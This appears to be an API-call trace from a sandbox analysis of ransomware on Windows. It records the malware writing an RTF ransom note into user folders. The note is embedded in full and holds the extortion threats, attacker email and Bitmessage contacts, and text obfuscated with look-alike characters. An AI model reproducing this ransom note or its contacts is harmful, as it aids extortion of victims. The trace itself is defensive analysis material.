lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.334] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.335] CloseHandle (hObject=0x2e8) returned 1 [0289.335] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0289.335] GetLastError () returned 0x2 [0289.335] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.336] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 